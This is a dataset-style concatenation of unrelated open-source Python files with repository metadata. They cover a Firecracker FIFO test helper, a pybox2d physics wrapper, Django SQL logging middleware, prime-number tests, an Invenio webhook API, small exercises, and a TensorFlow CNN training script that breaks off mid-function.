fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def threaded_reader(self, check_func, *args):
"""Start a thread to read fifo.
The thread that runs the `check_func` on each line
in the FIFO and enqueues any exceptions in the `exceptions_queue`.
"""
exceptions_queue = Queue()
metric_reader_thread = Thread(
target=self._do_thread_reader, args=(
exceptions_queue,
check_func,
*args
)
)
metric_reader_thread.start()
return exceptions_queue
def _do_thread_reader(self, exceptions_queue, check_func, *args):
"""Read from a FIFO opened as read-only.
This applies a function for checking output on each
line of the logs received.
Failures and exceptions are propagated to the main thread
through the `exceptions_queue`.
"""
max_iter = 20
while max_iter > 0:
data = self.fifo.readline()
if not data:
break
try:
check_func(
"{0}".format(data), *args
)
# pylint: disable=broad-except
# We need to propagate all type of exceptions to the main thread.
except Exception:
exceptions_queue.put(sys.exc_info())
max_iter = max_iter-1
exceptions_queue.put("Done")
def __del__(self):
"""Destructor cleaning up the FIFO from where it was created."""
if self.path:
try:
os.remove(self.path)
except OSError:
pass
|
firecracker-microvm/firecracker
|
tests/host_tools/logging.py
|
Python
|
apache-2.0
| 3,071
|
#!/usr/bin/python
"""
This file is part of the 'Elements' Project
Elements is a 2D Physics API for Python (supporting pybox2d)
Copyright (C) 2008, The Elements Team, <elements@linuxuser.at>
Home: http://elements.linuxuser.at
IRC: #elements on irc.freenode.org
Code: http://www.assembla.com/wiki/show/elements
svn co http://svn2.assembla.com/svn/elements
License: GPLv3 | See LICENSE for the full text
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__version__ = '0.11'
__contact__ = '<elements@linuxuser.at>'
# Load Box2D
try:
import Box2D as box2d
except:
print 'Could not load the pybox2d library (Box2D).'
print 'Please run "setup.py install" to install the dependencies.'
print
print 'Or recompile pybox2d for your system and python version.'
print "See http://code.google.com/p/pybox2d"
exit()
# Standard Imports
from random import shuffle
# Load Elements Definitions
from .locals import *
# Load Elements Modules
from . import tools
from . import drawing
from . import add_objects
from . import callbacks
from . import camera
# Main Class
class Elements:
"""The class which handles all interaction with the box2d engine
"""
# Settings
run_physics = True # Can pause the simulation
element_count = 0 # Element Count
renderer = None # Drawing class (from drawing.py)
# Default Input in Pixels! (can change to INPUT_METERS)
input_unit = INPUT_PIXELS
line_width = 0 # Line Width in Pixels (0 for fill)
listener = None
# Offset screen from world coordinate system (x, y) [meter5]
screen_offset = (0, 0)
# Offset screen from world coordinate system (x, y) [pixel]
screen_offset_pixel = (0, 0)
# The internal coordination system is y+=up, x+=right
# But it's possible to change the input coords to something else,
# they will then be translated on input
inputAxis_x_left = False # positive to the right by default
inputAxis_y_down = True # positive to up by default
mouseJoint = None
def __init__(self, screen_size, gravity=(0.0, -9.0), ppm=100.0,
renderer='pygame'):
""" Init the world with boundaries and gravity, and init colors.
Parameters:
screen_size .. (w, h) -- screen size in pixels [int]
gravity ...... (x, y) in m/s^2 [float] default: (0.0, -9.0)
ppm .......... pixels per meter [float] default: 100.0
renderer ..... which drawing method to use (str) default:
'pygame'
Return: class Elements()
"""
self.set_screenSize(screen_size)
self.set_drawingMethod(renderer)
# Create Subclasses
self.add = add_objects.Add(self)
self.callbacks = callbacks.CallbackHandler(self)
self.camera = camera.Camera(self)
# Set Boundaries
self.worldAABB = box2d.b2AABB()
self.worldAABB.lowerBound = (-100.0, -100.0)
self.worldAABB.upperBound = (100.0, 100.0)
# Gravity + Bodies will sleep on outside
self.gravity = gravity
self.doSleep = True
self.PIN_MOTOR_RADIUS = 2
# Create the World
self.world = box2d.b2World(self.worldAABB, self.gravity, self.doSleep)
# Init Colors
self.init_colors()
# Set Pixels per Meter
self.ppm = ppm
def set_inputUnit(self, input_unit):
""" Change the input unit to either meter or pixels
Parameters:
input ... INPUT_METERS or INPUT_PIXELS
Return: -
"""
self.input_unit = input_unit
def set_inputAxisOrigin(self, left=True, top=False):
""" Change the origin of the input coordinate system axis
Parameters:
left ... True or False -- x = 0 is at the left?
top .... True or False -- y = 0 is at the top?
Return: -
"""
self.inputAxis_x_left = not left
self.inputAxis_y_down = top
def set_drawingMethod(self, m, *kw):
""" Set a drawing method (from drawing.py)
Parameters:
m .... 'pygame' or 'cairo'
*kw .. keywords to pass to the initializer of the drawing method
Return: True if ok, False if no method identifier m found
"""
try:
self.renderer = getattr(drawing, "draw_%s" % m)(*kw)
return True
except AttributeError:
return False
def set_screenSize(self, size):
""" Set the current screen size
Parameters:
size ... (int(width), int(height)) in pixels
Return: -
"""
self.display_width, self.display_height = size
def init_colors(self):
""" Init self.colors with a fix set of hex colors
Return: -
"""
self.fixed_color = None
self.cur_color = 0
self.colors = [
"#737934", "#729a55", "#040404", "#1d4e29", "#ae5004", "#615c57",
"#6795ce", "#203d61", "#8f932b"
]
shuffle(self.colors)
def set_color(self, clr):
""" Set a fixed color for all future Elements (until reset_color()
is called)
Parameters:
clr ... Hex '#123123' or RGB ((r), (g), (b))
Return: -
"""
self.fixed_color = clr
def reset_color(self):
""" All Elements from now on will be drawn in random colors
Return: -
"""
self.fixed_color = None
def get_color(self):
""" Get a color - either the fixed one or the next from self.colors
Return: clr = ((R), (G), (B))
"""
if self.fixed_color is not None:
return self.fixed_color
if self.cur_color == len(self.colors):
self.cur_color = 0
shuffle(self.colors)
clr = self.colors[self.cur_color]
if clr[0] == "#":
clr = tools.hex2rgb(clr)
self.cur_color += 1
return clr
def update(self, fps=50.0, vel_iterations=10, pos_iterations=8):
""" Update the physics, if not paused (self.run_physics)
Parameters:
fps ............. fps with which the physics engine shall work
vel_iterations .. velocity substeps per step for smoother
simulation
pos_iterations .. position substeps per step for smoother
simulation
Return: -
"""
if self.run_physics:
self.world.Step(1.0 / fps, vel_iterations, pos_iterations)
def translate_coord(self, point):
""" Flips the coordinates in another coordinate system orientation,
if necessary (screen <> world coordinate system)
"""
x, y = point
if self.inputAxis_x_left:
x = self.display_width - x
if self.inputAxis_y_down:
y = self.display_height - y
return (x, y)
def translate_coords(self, pointlist):
"""Flips the coordinates in another coordinate system orientation, if
necessary (screen <> world coordinate system)
"""
p_out = []
for p in pointlist:
p_out.append(self.translate_coord(p))
return p_out
def to_world(self, pos):
""" Transfers a coordinate from the screen to the world
coordinate system (pixels)
- Change to the right axis orientation
- Include the offset: screen -- world coordinate system
- Include the scale factor (Screen coordinate system might have
a scale factor)
"""
dx, dy = self.screen_offset_pixel
x = pos[0] / self.camera.scale_factor
y = pos[1] / self.camera.scale_factor
x, y = self.translate_coord((round(x), round(y)))
return(x + dx, y + dy)
def to_screen(self, pos):
"""Transfers a coordinate from the world to the screen coordinate
system (pixels) and by the screen offset
"""
dx, dy = self.screen_offset_pixel
x = pos[0] - dx
y = pos[1] - dy
sx, sy = self.translate_coord((x, y))
return (sx * self.camera.scale_factor, sy * self.camera.scale_factor)
def meter_to_screen(self, i):
return i * self.ppm * self.camera.scale_factor
def get_bodies_at_pos(self, search_point, include_static=False, area=0.01):
""" Check if given point (screen coordinates) is inside any body.
If yes, return all found bodies, if not found return False
"""
sx, sy = self.to_world(search_point)
sx /= self.ppm
sy /= self.ppm
f = area / self.camera.scale_factor
AABB = box2d.b2AABB()
AABB.lowerBound = (sx - f, sy - f)
AABB.upperBound = (sx + f, sy + f)
amount, shapes = self.world.Query(AABB, 2)
if amount == 0:
return False
else:
bodylist = []
for s in shapes:
body = s.GetBody()
if not include_static:
if body.IsStatic() or body.GetMass() == 0.0:
continue
if s.TestPoint(body.GetXForm(), (sx, sy)):
bodylist.append(body)
return bodylist
def draw(self):
""" If a drawing method is specified, this function passes the objects
to the module in pixels.
Return: True if the objects were successfully drawn
False if the renderer was not set or another error occurred
"""
self.callbacks.start(CALLBACK_DRAWING_START)
# No need to run through the loop if there's no way to draw
if not self.renderer:
return False
if self.camera.track_body:
# Get Body Center
p1 = self.camera.track_body.GetWorldCenter()
# Center the Camera There, False = Don't stop the tracking
self.camera.center(self.to_screen((p1.x * self.ppm,
p1.y * self.ppm)),
stopTrack=False)
# Walk through all known elements
self.renderer.start_drawing()
for body in self.world.bodyList:
xform = body.GetXForm()
shape = body.GetShapeList()
angle = body.GetAngle()
if shape:
userdata = body.GetUserData()
if 'color' in userdata:
clr = userdata['color']
else:
clr = self.colors[0]
for shape in body.shapeList:
type_ = shape.GetType()
if type_ == box2d.e_circleShape:
position = box2d.b2Mul(xform, shape.GetLocalPosition())
pos = self.to_screen((position.x * self.ppm,
position.y * self.ppm))
self.renderer.draw_circle(
clr, pos, self.meter_to_screen(shape.radius), angle)
elif type_ == box2d.e_polygonShape:
points = []
for v in shape.vertices:
pt = box2d.b2Mul(xform, v)
x, y = self.to_screen((pt.x * self.ppm,
pt.y * self.ppm))
points.append([x, y])
self.renderer.draw_polygon(clr, points)
else:
print "unknown shape type:%d" % shape.GetType()
for joint in self.world.jointList:
p2 = joint.GetAnchor1()
p2 = self.to_screen((p2.x * self.ppm, p2.y * self.ppm))
p1 = joint.GetAnchor2()
p1 = self.to_screen((p1.x * self.ppm, p1.y * self.ppm))
if isinstance(joint, box2d.b2RevoluteJoint):
self.renderer.draw_circle((255, 255, 255), p1,
self.PIN_MOTOR_RADIUS, 0)
else:
self.renderer.draw_lines((0, 0, 0), False, [p1, p2], 3)
self.callbacks.start(CALLBACK_DRAWING_END)
self.renderer.after_drawing()
return True
def set_pin_motor_radius(self, radius):
self.PIN_MOTOR_RADIUS = radius
def mouse_move(self, pos):
pos = self.to_world(pos)
x, y = pos
x /= self.ppm
y /= self.ppm
if self.mouseJoint:
self.mouseJoint.SetTarget((x, y))
def pickle_save(self, fn, additional_vars={}):
import cPickle as pickle
self.add.remove_mouseJoint()
if not additional_vars and hasattr(self, '_pickle_vars'):
additional_vars = dict((var, getattr(self, var))
for var in self._pickle_vars)
save_values = [self.world, box2d.pickle_fix(self.world,
additional_vars, 'save')]
try:
pickle.dump(save_values, open(fn, 'wb'))
except Exception as s:
print 'Pickling failed: ', s
return
print 'Saved to %s' % fn
def pickle_load(self, fn, set_vars=True, additional_vars=[]):
"""
Load the pickled world in file fn.
additional_vars is a dictionary to be populated with the
loaded variables.
"""
import cPickle as pickle
try:
world, variables = pickle.load(open(fn, 'rb'))
world = world._pickle_finalize()
variables = box2d.pickle_fix(world, variables, 'load')
except Exception as s:
print 'Error while loading world: ', s
return
self.world = world
if set_vars:
# reset the additional saved variables:
for var, value in variables.items():
if hasattr(self, var):
setattr(self, var, value)
else:
print 'Unknown property %s=%s' % (var, value)
print 'Loaded from %s' % fn
return variables
def json_save(self, path, additional_vars={}, serialize=False):
import json
worldmodel = {}
save_id_index = 1
self.world.GetGroundBody().userData = {"saveid": 0}
bodylist = []
for body in self.world.GetBodyList():
if not body == self.world.GetGroundBody():
body.userData["saveid"] = save_id_index # set temporary data
save_id_index += 1
shapelist = body.GetShapeList()
modelbody = {}
modelbody['position'] = body.position.tuple()
modelbody['dynamic'] = body.IsDynamic()
modelbody['userData'] = body.userData
modelbody['angle'] = body.angle
modelbody['angularVelocity'] = body.angularVelocity
modelbody['linearVelocity'] = body.linearVelocity.tuple()
if shapelist and len(shapelist) > 0:
shapes = []
for shape in shapelist:
modelshape = {}
modelshape['density'] = shape.density
modelshape['restitution'] = shape.restitution
modelshape['friction'] = shape.friction
shapename = shape.__class__.__name__
if shapename == "b2CircleShape":
modelshape['type'] = 'circle'
modelshape['radius'] = shape.radius
modelshape['localPosition'] = \
shape.localPosition.tuple()
if shapename == "b2PolygonShape":
modelshape['type'] = 'polygon'
modelshape['vertices'] = shape.vertices
shapes.append(modelshape)
modelbody['shapes'] = shapes
bodylist.append(modelbody)
worldmodel['bodylist'] = bodylist
jointlist = []
for joint in self.world.GetJointList():
modeljoint = {}
if joint.__class__.__name__ == "b2RevoluteJoint":
modeljoint['type'] = 'revolute'
modeljoint['anchor'] = joint.GetAnchor1().tuple()
modeljoint['enableMotor'] = joint.enableMotor
modeljoint['motorSpeed'] = joint.motorSpeed
modeljoint['maxMotorTorque'] = joint.maxMotorTorque
elif joint.__class__.__name__ == "b2DistanceJoint":
modeljoint['type'] = 'distance'
modeljoint['anchor1'] = joint.GetAnchor1().tuple()
modeljoint['anchor2'] = joint.GetAnchor2().tuple()
modeljoint['body1'] = joint.body1.userData['saveid']
modeljoint['body2'] = joint.body2.userData['saveid']
modeljoint['collideConnected'] = joint.collideConnected
modeljoint['userData'] = joint.userData
jointlist.append(modeljoint)
worldmodel['jointlist'] = jointlist
controllerlist = []
worldmodel['controllerlist'] = controllerlist
if serialize:
addvars = additional_vars
trackinfo = addvars['trackinfo']
backup = trackinfo
for key, info in backup.iteritems():
if not info[3]:
try:
trackinfo[key][0] = info[0].userData['saveid']
trackinfo[key][1] = info[1].userData['saveid']
except AttributeError:
pass
else:
addvars['trackinfo'][key][0] = None
addvars['trackinfo'][key][1] = None
additional_vars['trackinfo'] = trackinfo
worldmodel['additional_vars'] = additional_vars
f = open(path, 'w')
f.write(json.dumps(worldmodel))
f.close()
for body in self.world.GetBodyList():
del body.userData['saveid'] # remove temporary data
def json_load(self, path, serialized=False):
import json
self.world.GetGroundBody().userData = {"saveid": 0}
f = open(path, 'r')
worldmodel = json.loads(f.read())
f.close()
# clean world
for joint in self.world.GetJointList():
self.world.DestroyJoint(joint)
for body in self.world.GetBodyList():
if body != self.world.GetGroundBody():
self.world.DestroyBody(body)
# load bodies
for body in worldmodel['bodylist']:
bodyDef = box2d.b2BodyDef()
bodyDef.position = body['position']
bodyDef.userData = body['userData']
bodyDef.angle = body['angle']
newBody = self.world.CreateBody(bodyDef)
#_logger.debug(newBody)
newBody.angularVelocity = body['angularVelocity']
newBody.linearVelocity = body['linearVelocity']
if 'shapes' in body:
for shape in body['shapes']:
if shape['type'] == 'polygon':
polyDef = box2d.b2PolygonDef()
polyDef.setVertices(shape['vertices'])
polyDef.density = shape['density']
polyDef.restitution = shape['restitution']
polyDef.friction = shape['friction']
newBody.CreateShape(polyDef)
if shape['type'] == 'circle':
circleDef = box2d.b2CircleDef()
circleDef.radius = shape['radius']
circleDef.density = shape['density']
circleDef.restitution = shape['restitution']
circleDef.friction = shape['friction']
circleDef.localPosition = shape['localPosition']
newBody.CreateShape(circleDef)
newBody.SetMassFromShapes()
for joint in worldmodel['jointlist']:
if joint['type'] == 'distance':
jointDef = box2d.b2DistanceJointDef()
body1 = self.getBodyWithSaveId(joint['body1'])
anch1 = joint['anchor1']
body2 = self.getBodyWithSaveId(joint['body2'])
anch2 = joint['anchor2']
jointDef.collideConnected = joint['collideConnected']
jointDef.Initialize(body1, body2, anch1, anch2)
jointDef.SetUserData(joint['userData'])
self.world.CreateJoint(jointDef)
if joint['type'] == 'revolute':
jointDef = box2d.b2RevoluteJointDef()
body1 = self.getBodyWithSaveId(joint['body1'])
body2 = self.getBodyWithSaveId(joint['body2'])
anchor = joint['anchor']
jointDef.Initialize(body1, body2, anchor)
jointDef.SetUserData(joint['userData'])
jointDef.enableMotor = joint['enableMotor']
jointDef.motorSpeed = joint['motorSpeed']
jointDef.maxMotorTorque = joint['maxMotorTorque']
self.world.CreateJoint(jointDef)
self.additional_vars = {}
addvars = {}
for (k, v) in worldmodel['additional_vars'].items():
addvars[k] = v
if serialized and 'trackinfo' in addvars:
trackinfo = addvars['trackinfo']
for key, info in trackinfo.iteritems():
if not info[3]:
addvars['trackinfo'][key][0] = \
self.getBodyWithSaveId(info[0])
addvars['trackinfo'][key][1] = \
self.getBodyWithSaveId(info[1])
else:
addvars['trackinfo'][key][0] = None
addvars['trackinfo'][key][1] = None
self.additional_vars = addvars
for body in self.world.GetBodyList():
del body.userData['saveid'] # remove temporary data
def getBodyWithSaveId(self, saveid):
for body in self.world.GetBodyList():
if body.userData['saveid'] == saveid:
return body
|
samdroid-apps/physics
|
myelements/elements.py
|
Python
|
gpl-3.0
| 22,869
|
"""Middleware that prints all database queries
Use for fast database inspections.
Taken from https://djangosnippets.org/snippets/264/
"""
from django.db import connection
class TerminalLoggingMiddleware:
@staticmethod
def process_response(request, response):
"""Reads the query data and prints it"""
from sys import stdout
if stdout.isatty():
for query in connection.queries:
print("\033[1;31m[%s]\033[0m \033[1m%s\033[0m" % (
query['time'], " ".join(query['sql'].split())))
return response
|
AmatanHead/collective-blog
|
collective_blog/middleware/sql_logger.py
|
Python
|
mit
| 584
|
"""
Some useful tools and utilities for wxPython.
"""
# XRCed is purposfully left out so epydoc won't document it
__all__ = [
'dbg',
'genaxmodule',
'helpviewer',
'img2img',
'img2png',
'img2py',
'img2xpm',
]
|
garrettcap/Bulletproof-Backup
|
wx/tools/__init__.py
|
Python
|
gpl-2.0
| 244
|
import pytest
from ..test_sequences import reference_values
from .primes import is_prime, largest_prime_factor,\
prime_sieve, smallest_prime_factor, generate_prime_factors_multiplicity
primes_list = reference_values['primes']
@pytest.mark.parametrize('n', range(-1, max(primes_list) + 1))
def test_is_prime(n: int) -> None:
assert is_prime(n) == (n in primes_list)
assert is_prime(n, [2, 3, 5]) == (n in primes_list)
@pytest.mark.parametrize('n', range(-100, 2))
def test_smallest_prime_factor_negative_error(n) -> None:
with pytest.raises(ValueError):
smallest_prime_factor(n)
@pytest.mark.parametrize('p,remainder', ((2, 1), (2, 5), (5, 77)))
def test_smallest_prime_factor(p: int, remainder: int) -> None:
assert smallest_prime_factor(p * remainder) == p
@pytest.mark.parametrize('n', range(-100, 2))
def test_largest_prime_factor_negative_error(n):
with pytest.raises(ValueError):
largest_prime_factor(n)
@pytest.mark.parametrize('p,remainder', ((2, 1), (5, 2), (11, 35)))
def test_largest_prime_factor(p: int, remainder: int) -> None:
assert largest_prime_factor(p * remainder) == p
@pytest.mark.parametrize("n", range(1, 100))
def test_generate_prime_factors_multiplicity(n: int) -> None:
for factor, multiplicity in generate_prime_factors_multiplicity(n):
contribution = factor ** multiplicity
assert n % contribution == 0
n //= contribution
assert n == 1
def test_sieve():
assert len(list(prime_sieve(-1))) == 0
n = max(primes_list)
assert prime_sieve(0) == []
assert list(prime_sieve(n + 1)) == primes_list
|
cryvate/project-euler
|
project_euler/library/number_theory/test_primes.py
|
Python
|
mit
| 1,630
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import absolute_import
from functools import wraps
from flask import request
from flask.ext.restful import Resource, abort
from invenio.ext.restful import require_api_auth, require_oauth_scopes
from invenio.modules.oauth2server.models import Scope
from invenio.modules.oauth2server.registry import scopes
from .models import Receiver, ReceiverDoesNotExists, InvalidPayload, \
WebhookError
def error_handler(f):
"""Decorator to handle exceptions."""
@wraps(f)
def inner(*args, **kwargs):
try:
return f(*args, **kwargs)
except ReceiverDoesNotExists:
abort(404, message="Receiver does not exists.", status=404)
except InvalidPayload as e:
abort(
415,
message="Receiver does not support the"
" content-type '%s'." % e.args[0],
status=415)
except WebhookError as e:
abort(
500,
message="Internal server error",
status=500
)
return inner
#
# Default decorators
#
api_decorators = [
error_handler,
]
#
# REST Resources
#
class ReceiverEventListResource(Resource):
"""Receiver event hook."""
method_decorators = api_decorators
def get(self, receiver_id=None):
abort(405)
@require_api_auth()
@require_oauth_scopes('webhooks:event')
def post(self, receiver_id=None):
receiver = Receiver.get(receiver_id)
receiver.consume_event(request.oauth.access_token.user_id)
return {'status': 202, 'message': 'Accepted'}, 202
def put(self, receiver_id=None):
abort(405)
def delete(self, receiver_id=None):
abort(405)
def head(self, receiver_id=None):
abort(405)
def options(self, receiver_id=None):
abort(405)
def patch(self, receiver_id=None):
abort(405)
#
# Register API resources
#
def setup_app(app, api):
api.add_resource(
ReceiverEventListResource,
'/api/hooks/receivers/<string:receiver_id>/events/',
)
with app.app_context():
scopes.register(Scope(
'webhooks:event',
group='Notifications',
help_text='Allow notifications from external service.',
internal=True,
))
|
lnielsen/invenio
|
invenio/modules/webhooks/restful.py
|
Python
|
gpl-2.0
| 3,119
|
"""
Given numRows, generate the first numRows of Pascal's triangle.
For example, given numRows = 5,
Return
[
[1],
[1,1],
[1,2,1],
[1,3,3,1],
[1,4,6,4,1]
]
"""
class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
lists = []
for i in range(numRows):
lists.append([1]*(i+1))
if i > 1:
for j in range(1,i):
lists[i][j] = lists[i-1][j-1] + lists[i-1][j]
return lists
"""
found a brilliant solusion!
def generate(self, numRows):
res = [[1]]
for i in range(1, numRows):
res += [map(lambda x, y: x+y, res[-1] + [0], [0] + res[-1])]
return res[:numRows]
explanation: Any row can be constructed using the offset sum of the previous row. Example:
1 3 3 1 0
+ 0 1 3 3 1
= 1 4 6 4 1
"""
|
dichen001/Go4Jobs
|
JackChen/array/118. Pascal's Triangle.py
|
Python
|
gpl-3.0
| 910
|
#Brian Stamm
#CSC 110
#11.21.14
#Lab 9 - Advanced Strings
import os
def main():
instructions()
file_name = input("What is the name of the file we are using? ")
file = open(file_name, 'r')
line = file.readline()
upper_count = 0
total_count = 0
lower_count = 0
digit_count = 0
space_count = 0
while line != '':
for ch in line:
if ch.isupper() == True:
upper_count +=1
total_count +=1
elif ch.islower() == True:
lower_count +=1
total_count+=1
elif ch.isdigit() == True:
digit_count+=1
total_count+=1
elif ch.isspace() == True:
space_count+=1
total_count+=1
line=file.readline()
upper_percent = format(((upper_count/total_count)*100),'.1f')
lower_percent = format(((lower_count/total_count)*100),'.1f')
digit_percent = format(((digit_count/total_count)*100),'.1f')
space_percent = format(((space_count/total_count)*100),'.1f')
print ("Upper case: ",upper_count)
print("Upper percent: %s%%" %(upper_percent))
print()
print ("Lower case: ",lower_count)
print("Lower percent: %s%%"%(lower_percent))
print()
print("Digits: ",digit_count)
print("Digit percent: %s%%"%(digit_percent))
print()
print ("White Space: ",space_count)
print("White Space percent: %s%%"%(space_percent))
file.close()
def instructions():
print("This program will give a total count of characters in a .txt file")
print("Be sure to include the extension (ie - .txt) at the end of the file name.")
print()
main()
|
bkstamm67/python
|
pastHW/fileStringCounter.py
|
Python
|
mit
| 1,774
|
from test import *
import tensorflow as tf
ABS_PATH = "/home/elvis/work/ML/tensorflow/separa/"
SIZE = 4746
# SIZE = 828
LABEL = 5
# LABEL = 6
TRAIN_SIZE = 768
# ACCELERATION_FACTOR = 256
ACCELERATION_FACTOR = 2048
BASE_DIVIDE = 2048
# TRAIN_SIZE = 3200
BATCH_SIZE = 128
GLOBAL_STEP = 200000000
DECAY_STEPS = 100
EVAL_SIZE = SIZE - TRAIN_SIZE
# IMAGE_SIZE = 645 - 60
IMAGE_SIZE = 227
NUM_CHANNEL = 3
REPORT_CONTROL = 10
TRAIN_SLICE = (int(SIZE / LABEL * round((float(TRAIN_SIZE) / SIZE), 1)))
LEARNING_RATE = 0.001
# REGULAR = 3e-3
REGULAR = 3e-4
DROP_OUT = 80e-2
DECAY_RATE = 0.9995
MOMENTUM = 99e-2
SEED = int(random.random() * 1000)
BATCH_NORMALIZATION = 1e-3
# SEED = 295.730694719
# SEED = 935.121374578
# SEED = 149.555544719
# SEED = 266.751015428 pretty good for this data .
out_file = "./cleaned_data_1.csv"
def data_clean(img, filename, label):
window_name = "IMG"
label = np.argmax(label)
print (filename)
print (label)
cv.namedWindow(window_name)
while True:
cv.imshow(window_name, img)
character = cv.waitKey(100)
if int(character) == 97:
f = file(out_file, 'a+')
f.writelines(str(filename) + "," + str(label) + "\n")
f.close()
break
elif int(character) == 98:
f = file(out_file, 'a+')
label = raw_input("input the label you wanna.")
f.writelines(str(filename) + "," + str(label) + "\n")
f.close()
break
else:
continue
def main(argv=None):
if argv is None:
print ("ERROR FOR ARGV IS NONE")
else:
print (argv)
global SIZE
data, label, fileset = parse_new_data(SIZE=SIZE, IMAGE_SIZE=IMAGE_SIZE, NUM_CHANNEL=NUM_CHANNEL, LABEL=LABEL,
BASE_DIVIDE=BASE_DIVIDE)
for x in range(SIZE):
data_clean(data[x], fileset[x], label[x])
print (data.shape)
print (data.dtype)
print (fileset[0])
print (label[0])
print (fileset[1])
print (label[1])
print (fileset[-1])
print (label[-1])
SIZE = label.shape[0]
data, label = alignment_data(data=data, label=label, LABEL=LABEL, BASE_DIVIDE=BASE_DIVIDE)
data = approximate_normalization(data)
train_data, train_label, eval_data, eval_label = random_sample(data, label, ACCELERATION_FACTOR, LABEL)
TRAIN_SIZE = train_label.shape[0]
EVAL_SIZE = eval_label.shape[0]
train_data, train_label = random_shuffle(train_data, train_label)
eval_data, eval_label = random_shuffle(eval_data, eval_label)
train_data = train_data.astype(np.float32)
eval_data = eval_data.astype(np.float32)
train_label = train_label.astype(np.int64)
eval_label = eval_label.astype(np.int64)
print ("ALL SIZE FOR %d " % SIZE)
print ("TRAIN SIZE FOR %d " % TRAIN_SIZE)
feed_eval_data = tf.placeholder(dtype=tf.float32, shape=[None, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL],
name="feed_eval_data")
feed_eval_label = tf.placeholder(dtype=tf.int64, shape=[None, LABEL], name="feed_eval_label")
feed_train_data = tf.placeholder(dtype=tf.float32, shape=[None, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL],
name="feed_train_data")
feed_train_label = tf.placeholder(dtype=tf.int64, shape=[None, LABEL], name="feed_train_label")
convolution_weights_1 = tf.Variable(initial_value=tf.truncated_normal(shape=[11, 11, NUM_CHANNEL, 96], seed=SEED,
stddev=0.01, dtype=tf.float32), name="conv1")
convolution_biases_1 = tf.Variable(initial_value=tf.zeros(shape=[96], dtype=tf.float32), name="conv1_bias")
convolution_weights2 = tf.Variable(initial_value=tf.truncated_normal(shape=[5, 5, 96, 256], seed=SEED,
stddev=0.01, dtype=tf.float32), name="conv2")
convolution_biases2 = tf.Variable(initial_value=tf.zeros(shape=[256], dtype=tf.float32), name="conv2_bias")
convolution_weights3 = tf.Variable(initial_value=tf.truncated_normal(shape=[3, 3, 256, 384], seed=SEED,
stddev=0.01, dtype=tf.float32), name="conv3")
convolution_biases3 = tf.Variable(initial_value=tf.zeros(shape=[384], dtype=tf.float32), name="conv3_bias")
convolution_weights4 = tf.Variable(initial_value=tf.truncated_normal(shape=[3, 3, 384, 384], seed=SEED,
stddev=0.01, dtype=tf.float32), name="conv4")
convolution_biases4 = tf.Variable(initial_value=tf.zeros(shape=[384], dtype=tf.float32), name="conv4_bias")
convolution_weights5 = tf.Variable(initial_value=tf.truncated_normal(shape=[3, 3, 384, 256], seed=SEED,
stddev=0.01, dtype=tf.float32), name="conv5")
convolution_biases5 = tf.Variable(initial_value=tf.zeros(shape=[256], dtype=tf.float32), name="conv5_bias")
fc1_weights = tf.Variable(
initial_value=tf.truncated_normal(shape=[9216, 4096], stddev=0.01, seed=SEED, dtype=tf.float32), name="fc1")
fc1_biases = tf.Variable(initial_value=tf.zeros(shape=[4096], dtype=tf.float32), name="fc1_bias")
fc2_weights = tf.Variable(
initial_value=tf.truncated_normal(shape=[4096, 4096], stddev=0.01, seed=SEED, dtype=tf.float32), name="fc2")
fc2_biases = tf.Variable(initial_value=tf.zeros(shape=[4096], dtype=tf.float32), name="fc2_bias")
fc3_weights = tf.Variable(
initial_value=tf.truncated_normal(shape=[4096, LABEL], stddev=0.01, seed=SEED, dtype=tf.float32), name="fc3")
# fc3_biases = tf.Variable(initial_value=tf.zeros(shape=[5], dtype=tf.float32))
def forward(info=None, flag=False):
info = tf.reshape(info, [-1, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL])
print (info.get_shape())
conv1 = tf.nn.conv2d(input=info,
filter=convolution_weights_1,
padding="VALID",
strides=[1, 4, 4, 1])
print (conv1.get_shape())
# conv1_bn = batch_normalization(x=conv1, depth=conv1.get_shape()[-1], phase_train=flag)
relu1 = tf.nn.relu(tf.nn.bias_add(conv1, convolution_biases_1))
print (relu1.get_shape())
pool1 = tf.nn.avg_pool(value=relu1,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding="VALID")
print (pool1.get_shape())
norm1 = tf.nn.local_response_normalization(pool1)
# norm1 = batch_norm(pool1, flag)
print (norm1.get_shape())
conv2 = tf.nn.conv2d(input=norm1,
strides=[1, 1, 1, 1],
padding="SAME",
filter=convolution_weights2)
# tf.nn.batch_normalization()
# conv2_bn = batch_normalization(x=conv2, depth=conv2.get_shape()[-1], phase_train=flag)
print (conv2.get_shape())
relu2 = tf.nn.relu(tf.nn.bias_add(conv2, convolution_biases2))
print (relu2.get_shape())
pool2 = tf.nn.max_pool(value=relu2,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding="VALID")
print (pool2.get_shape())
norm2 = tf.nn.local_response_normalization(pool2)
# norm2 = batch_norm(pool2, flag)
print (norm2.get_shape())
conv3 = tf.nn.conv2d(input=norm2,
strides=[1, 1, 1, 1],
padding="SAME",
filter=convolution_weights3)
print (conv3.get_shape())
relu3 = tf.nn.relu(tf.nn.bias_add(conv3, convolution_biases3))
print (relu3.get_shape())
conv4 = tf.nn.conv2d(input=relu3,
strides=[1, 1, 1, 1],
padding="SAME",
filter=convolution_weights4)
print (conv4.get_shape())
